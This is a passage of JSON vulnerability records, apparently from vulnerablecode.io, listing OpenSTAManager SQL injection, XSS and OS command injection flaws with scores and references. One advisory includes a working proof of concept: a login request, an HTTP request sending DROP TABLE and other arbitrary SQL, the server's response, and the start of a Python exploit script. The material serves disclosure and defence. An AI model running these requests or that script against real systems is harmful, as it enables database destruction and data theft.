"https://github.com/devcode-it/openstamanager/security/advisories/GHSA-whv5-4q2f-q68g", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-03T19:52:40Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-whv5-4q2f-q68g" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29782", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29782" }, { "reference_url": "https://github.com/advisories/GHSA-whv5-4q2f-q68g", "reference_id": "GHSA-whv5-4q2f-q68g", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-whv5-4q2f-q68g" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110583?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.10.2", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.10.2" } ], "aliases": [ "CVE-2026-29782", "GHSA-whv5-4q2f-q68g" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5tn6-au4e-33de" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50039?format=api", "vulnerability_id": "VCID-7e19-24d8-f7gd", "summary": "OpenSTAManager has a Time-Based Blind SQL Injection in Article Pricing Module\nCritical Time-Based Blind SQL Injection vulnerability in the article pricing module of OpenSTAManager v2.9.8 allows authenticated attackers to extract complete database contents including user credentials, customer data, and financial records through time-based Boolean inference attacks.\n\n**Status:** ✅ Confirmed and tested on live instance (v2.9.8) end [demo.osmbusiness.it](https://demo.osmbusiness.it/) (v2.9.7)\n**Vulnerable Parameter:** `idarticolo` (GET)\n**Affected Endpoint:** `/ajax_complete.php?op=getprezzi`\n**Affected Module:** Articoli (Articles/Products)", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24416", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02401", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02453", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02459", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03086", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24416" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24416", "reference_id": "CVE-2026-24416", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24416" }, { "reference_url": "https://github.com/advisories/GHSA-p864-fqgv-92q4", "reference_id": "GHSA-p864-fqgv-92q4", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-p864-fqgv-92q4" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-p864-fqgv-92q4", "reference_id": "GHSA-p864-fqgv-92q4", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-09T15:20:55Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-p864-fqgv-92q4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/958981?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.10-beta", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5srf-wjj5-z3fj" }, { "vulnerability": "VCID-5tn6-au4e-33de" }, { "vulnerability": "VCID-e7y7-21j6-k7hj" }, { "vulnerability": "VCID-nzzy-h46k-bfcr" }, { "vulnerability": "VCID-uq8m-y1hg-qbgx" }, { "vulnerability": "VCID-y85c-bbqe-r3bt" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.10-beta" } ], "aliases": [ "CVE-2026-24416", "GHSA-p864-fqgv-92q4" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7e19-24d8-f7gd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50526?format=api", "vulnerability_id": "VCID-7h5v-9rhe-2bbp", "summary": "OpenSTAManager Affected by XSS in modifica_iva.php via righe parameter\nMultiple Reflected Cross-Site Scripting (XSS) vulnerabilities in OpenSTAManager v2.9.8 allow unauthenticated attackers to execute arbitrary JavaScript code in the context of other users' browsers through crafted URL parameters, potentially leading to session hijacking, credential theft, and unauthorized actions.\n\n**Vulnerable Parameter:** `righe` (GET)", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24415", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05635", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.0558", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05622", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05621", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24415" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24415", "reference_id": "CVE-2026-24415", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24415" }, { "reference_url": "https://github.com/advisories/GHSA-jfgp-g7x7-j25j", "reference_id": "GHSA-jfgp-g7x7-j25j", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-jfgp-g7x7-j25j" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-jfgp-g7x7-j25j", "reference_id": "GHSA-jfgp-g7x7-j25j", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-04T21:17:09Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-jfgp-g7x7-j25j" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/73823?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.9.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2br1-99zg-z7bh" }, { "vulnerability": "VCID-5srf-wjj5-z3fj" }, { "vulnerability": "VCID-5tn6-au4e-33de" }, { "vulnerability": "VCID-7e19-24d8-f7gd" }, { "vulnerability": "VCID-81kx-rj8c-dkbr" }, { "vulnerability": "VCID-8x62-3aff-hbak" }, { "vulnerability": "VCID-by14-5puv-qygm" }, { "vulnerability": "VCID-e7y7-21j6-k7hj" }, { "vulnerability": "VCID-gnx6-chzh-3fc3" }, { "vulnerability": "VCID-nv3t-9e16-8kbn" }, { "vulnerability": "VCID-nzzy-h46k-bfcr" }, { "vulnerability": "VCID-pxzr-bvsj-y3gs" }, { "vulnerability": "VCID-uq8m-y1hg-qbgx" }, { "vulnerability": "VCID-w4gk-vbbq-13ea" }, { "vulnerability": "VCID-y85c-bbqe-r3bt" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.9.8" } ], "aliases": [ "CVE-2026-24415", "GHSA-jfgp-g7x7-j25j" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7h5v-9rhe-2bbp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50048?format=api", "vulnerability_id": "VCID-81kx-rj8c-dkbr", "summary": "OpenSTAManager has a SQL Injection in the Prima Nota module\nCritical Error-Based SQL Injection vulnerability in the Prima Nota (Journal Entry) module of OpenSTAManager v2.9.8 allows authenticated attackers to extract complete database contents including user credentials, customer PII, and financial records through XML error messages by injecting malicious SQL into URL parameters.\n\n**Status:** ✅ Confirmed and tested on live instance (v2.9.8)\n**Vulnerable Parameters:** `id_documenti` (GET parameters)\n**Affected Endpoint:** `/modules/primanota/add.php`\n**Attack Type:** Error-Based SQL Injection (IN clause)", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24419", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02401", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02453", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02459", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03086", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24419" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24419", "reference_id": "CVE-2026-24419", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24419" }, { "reference_url": "https://github.com/advisories/GHSA-4j2x-jh4m-fqv6", "reference_id": "GHSA-4j2x-jh4m-fqv6", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4j2x-jh4m-fqv6" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4j2x-jh4m-fqv6", "reference_id": "GHSA-4j2x-jh4m-fqv6", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-02-06T18:30:04Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4j2x-jh4m-fqv6" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/958981?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.10-beta", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5srf-wjj5-z3fj" }, { "vulnerability": "VCID-5tn6-au4e-33de" }, { "vulnerability": "VCID-e7y7-21j6-k7hj" }, { "vulnerability": "VCID-nzzy-h46k-bfcr" }, { "vulnerability": "VCID-uq8m-y1hg-qbgx" }, { "vulnerability": "VCID-y85c-bbqe-r3bt" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.10-beta" } ], "aliases": [ "CVE-2026-24419", "GHSA-4j2x-jh4m-fqv6" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-81kx-rj8c-dkbr" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50056?format=api", "vulnerability_id": "VCID-8x62-3aff-hbak", "summary": "OpenSTAManager has an OS Command Injection in P7M File Processing\nA critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-69212", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00133", "scoring_system": "epss", "scoring_elements": "0.32483", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00133", "scoring_system": "epss", "scoring_elements": "0.32412", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00133", "scoring_system": "epss", "scoring_elements": "0.32451", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00152", "scoring_system": "epss", "scoring_elements": "0.35628", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-69212" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69212", "reference_id": "CVE-2025-69212", "reference_type": "", "scores": [ { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69212" }, { "reference_url": "https://github.com/advisories/GHSA-25fp-8w8p-mx36", "reference_id": "GHSA-25fp-8w8p-mx36", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-25fp-8w8p-mx36" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36", "reference_id": "GHSA-25fp-8w8p-mx36", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-09T15:20:50Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/958981?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.10-beta", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5srf-wjj5-z3fj" }, { "vulnerability": "VCID-5tn6-au4e-33de" }, { "vulnerability": "VCID-e7y7-21j6-k7hj" }, { "vulnerability": "VCID-nzzy-h46k-bfcr" }, { "vulnerability": "VCID-uq8m-y1hg-qbgx" }, { "vulnerability": "VCID-y85c-bbqe-r3bt" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.10-beta" } ], "aliases": [ "CVE-2025-69212", "GHSA-25fp-8w8p-mx36" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8x62-3aff-hbak" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50052?format=api", "vulnerability_id": "VCID-by14-5puv-qygm", "summary": "OpenSTAManager has a SQL Injection in Scadenzario Print Template\nAn **authenticated SQL Injection vulnerability** in OpenSTAManager's Scadenzario (Payment Schedule) print template allows any authenticated user to extract sensitive data from the database, including admin credentials, customer information, and financial records. The vulnerability enables complete database read access through error-based SQL injection techniques.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-69216", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02401", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02453", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02459", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03086", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-69216" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69216", "reference_id": "CVE-2025-69216", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69216" }, { "reference_url": "https://github.com/advisories/GHSA-q6g3-fv43-m2w6", "reference_id": "GHSA-q6g3-fv43-m2w6", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-q6g3-fv43-m2w6" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-q6g3-fv43-m2w6", "reference_id": "GHSA-q6g3-fv43-m2w6", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-09T15:20:53Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-q6g3-fv43-m2w6" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/958981?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.10-beta", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5srf-wjj5-z3fj" }, { "vulnerability": "VCID-5tn6-au4e-33de" }, { "vulnerability": "VCID-e7y7-21j6-k7hj" }, { "vulnerability": "VCID-nzzy-h46k-bfcr" }, { "vulnerability": "VCID-uq8m-y1hg-qbgx" }, { "vulnerability": "VCID-y85c-bbqe-r3bt" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.10-beta" } ], "aliases": [ "CVE-2025-69216", "GHSA-q6g3-fv43-m2w6" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-by14-5puv-qygm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90160?format=api", "vulnerability_id": "VCID-e7y7-21j6-k7hj", "summary": "OpenSTAManager: SQL Injection via Aggiornamenti Module\n## Description\n\nThe Aggiornamenti (Updates) module in OpenSTAManager <= 2.10.1 contains a database conflict resolution feature (`op=risolvi-conflitti-database`) that accepts a JSON array of SQL statements via POST and executes them directly against the database without any validation, allowlist, or sanitization.\n\nAn authenticated attacker with access to the Aggiornamenti module can execute arbitrary SQL statements including `CREATE`, `DROP`, `ALTER`, `INSERT`, `UPDATE`, `DELETE`, `SELECT INTO OUTFILE`, and any other SQL command supported by the MySQL server. Foreign key checks are explicitly disabled before execution (`SET FOREIGN_KEY_CHECKS=0`), further reducing database integrity protections.\n\n## Affected Code\n\n**File:** `modules/aggiornamenti/actions.php`, lines 40-82\n\n```php\ncase 'risolvi-conflitti-database':\n $queries_json = post('queries'); // Line 41: User input from POST\n // ...\n $queries = json_decode($queries_json, true); // Line 50: JSON decoded to array\n // ...\n $dbo->query('SET FOREIGN_KEY_CHECKS=0'); // Line 69: FK checks DISABLED\n\n $errors = [];\n $executed = 0;\n\n foreach ($queries as $query) {\n try {\n $dbo->query($query); // Line 76: DIRECT EXECUTION\n ++$executed;\n } catch (Exception $e) {\n $errors[] = $query.' - '.$e->getMessage(); // Line 79: Error details leaked\n }\n }\n $dbo->query('SET FOREIGN_KEY_CHECKS=1'); // Line 82: FK checks re-enabled\n```\n\n### Key Issues\n\n1. **No query validation:** The SQL statements from user input are executed directly via `$dbo->query()` without any validation or filtering.\n2. **No allowlist:** There is no restriction on which SQL commands are permitted (e.g., only `ALTER TABLE` or `CREATE INDEX`).\n3. **Foreign key checks disabled:** `SET FOREIGN_KEY_CHECKS=0` is executed before the user queries, allowing data integrity violations.\n4. **Error message leakage:** Exception messages containing database structure details are returned in the JSON response (line 79).\n5. **No authorization check:** The action only requires module-level access, with no additional authorization for this destructive operation.\n\n## Root Cause Analysis\n\n### Data Flow\n\n1. Attacker sends POST request to `/editor.php?id_module=<Aggiornamenti_ID>` with `op=risolvi-conflitti-database` and `queries=[\"<arbitrary SQL>\"]`\n2. `editor.php` includes `actions.php` (root), which checks module permission (`$structure->permission == 'rw'`) at line 472\n3. Root `actions.php` includes the module's `actions.php` at line 489\n4. `modules/aggiornamenti/actions.php` reads the `queries` POST parameter (line 41)\n5. JSON-decodes it into an array of strings (line 50)\n6. Iterates over each string and executes it as a SQL query via `$dbo->query()` (line 76)\n\n### Why This Is Exploitable\n\n- The feature is intended for resolving database schema conflicts during updates\n- However, there is no restriction on what SQL can be executed\n- Any authenticated user with `rw` permission on the Aggiornamenti module can exploit this\n- The default admin account always has access to this module\n\n## Proof of Concept\n\n### Prerequisites\n\n- A valid user account with access to the Aggiornamenti module\n\n### Step 1: Authenticate\n\n```\nPOST /index.php HTTP/1.1\nHost: <target>\nContent-Type: application/x-www-form-urlencoded\n\nop=login&username=<user>&password=<pass>\n```\n\nSave the `PHPSESSID` cookie.\n\n### Step 2: Detect Aggiornamenti Module ID\n\nNavigate to the application dashboard and inspect the sidebar links. The Aggiornamenti module URL contains `id_module=<ID>`. Default value in a standard installation: `6`.\n\n### Step 3: Execute Arbitrary SQL\n\n**Request (captured in Burp Suite):**\n\n```\nPOST /editor.php?id_module=6&id_record=6 HTTP/1.1\nHost: 127.0.0.1:8888\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36\nAccept-Encoding: gzip, deflate, br\nAccept: */*\nConnection: keep-alive\nCookie: PHPSESSID=6a1a8ab261f8d93c6e21d2ee566c17a5\nContent-Type: application/x-www-form-urlencoded\n\nop=risolvi-conflitti-database&queries=%5B%22DROP+TABLE+IF+EXISTS+poc_vuln04_verify%22%2C+%22CREATE+TABLE+poc_vuln04_verify+%28id+INT+AUTO_INCREMENT+PRIMARY+KEY%2C+proof+VARCHAR%28255%29%2C+ts+TIMESTAMP+DEFAULT+CURRENT_TIMESTAMP%29%22%2C+%22INSERT+INTO+poc_vuln04_verify+%28proof%29+VALUES+%28%27CVE_PROOF_arbitrary_sql_execution%27%29%22%5D\n```\n\nThe URL-decoded `queries` parameter is:\n\n```json\n[\n \"DROP TABLE IF EXISTS poc_vuln04_verify\",\n \"CREATE TABLE poc_vuln04_verify (id INT AUTO_INCREMENT PRIMARY KEY, proof VARCHAR(255), ts TIMESTAMP DEFAULT CURRENT_TIMESTAMP)\",\n \"INSERT INTO poc_vuln04_verify (proof) VALUES ('CVE_PROOF_arbitrary_sql_execution')\"\n]\n```\n\nThree arbitrary SQL statements are sent: `DROP TABLE`, `CREATE TABLE`, and `INSERT INTO` — demonstrating full control over the database.\n\n**Response (captured in Burp Suite):**\n\nThe server responds with HTTP 200 and the following JSON response confirming successful execution of all 3 queries:\n\n```json\n{\"success\":true,\"message\":\"Tutte le query sono state eseguite con successo (3 query).<br><br>Query eseguite:<br>DROP TABLE IF EXISTS poc_vuln04_verify<br>CREATE TABLE poc_vuln04_verify (id INT AUTO_INCREMENT PRIMARY KEY, proof VARCHAR(255), ts TIMESTAMP DEFAULT CURRENT_TIMESTAMP)<br>INSERT INTO poc_vuln04_verify (proof) VALUES ('CVE_PROOF_arbitrary_sql_execution')\",\"flash_message\":true}\n```\n\n<img width=\"1490\" height=\"355\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f0df5dd9-4ede-4503-8e00-58c47f2cd06a\" />\n\n\n### Step 4: Verify Execution\n\nThe table `poc_vuln04_verify` was created in the database with the inserted data, confirming that arbitrary SQL was executed. The server confirms: `\"Tutte le query sono state eseguite con successo (3 query).\"`\n\n### Observed Results\n\n| Action | Result |\n|---|---|\n| `DROP TABLE IF EXISTS` | Table dropped successfully |\n| `CREATE TABLE` | Table created successfully |\n| `INSERT INTO` | Data inserted |\n| `SELECT VERSION()` (via INSERT...SELECT) | MySQL version extracted: `8.3.0` |\n| Server confirmation | `\"success\":true` with query count |\n| Execution with admin user | Success |\n| Execution with non-admin user (Tecnici group with module access) | Success |\n\n### Exploit\n\n```\npython3 poc_sql.py -t http://<target>:8888 -u admin -p admin\n```\n\n```python\n#!/usr/bin/env python3\n\nimport argparse\nimport json\nimport re\nimport sys\nimport urllib3\n\nimport requests\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nDEFAULT_HEADERS = {\n \"User-Agent\": (\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) \"\n \"AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/120.0.0.0 Safari/537.36\"\n ),\n}\n\n\ndef parse_args():\n p = argparse.ArgumentParser(\n description=\"OpenSTAManager <= 2.10.1 — Arbitrary SQL Exec in Aggiornamenti (PoC)\",\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=(\n \"Examples:\\n\"\n \" %(prog)s -t http://target:8888 -u admin -p admin\\n\"\n \" %(prog)s -t http://target:8888 -u admin -p admin 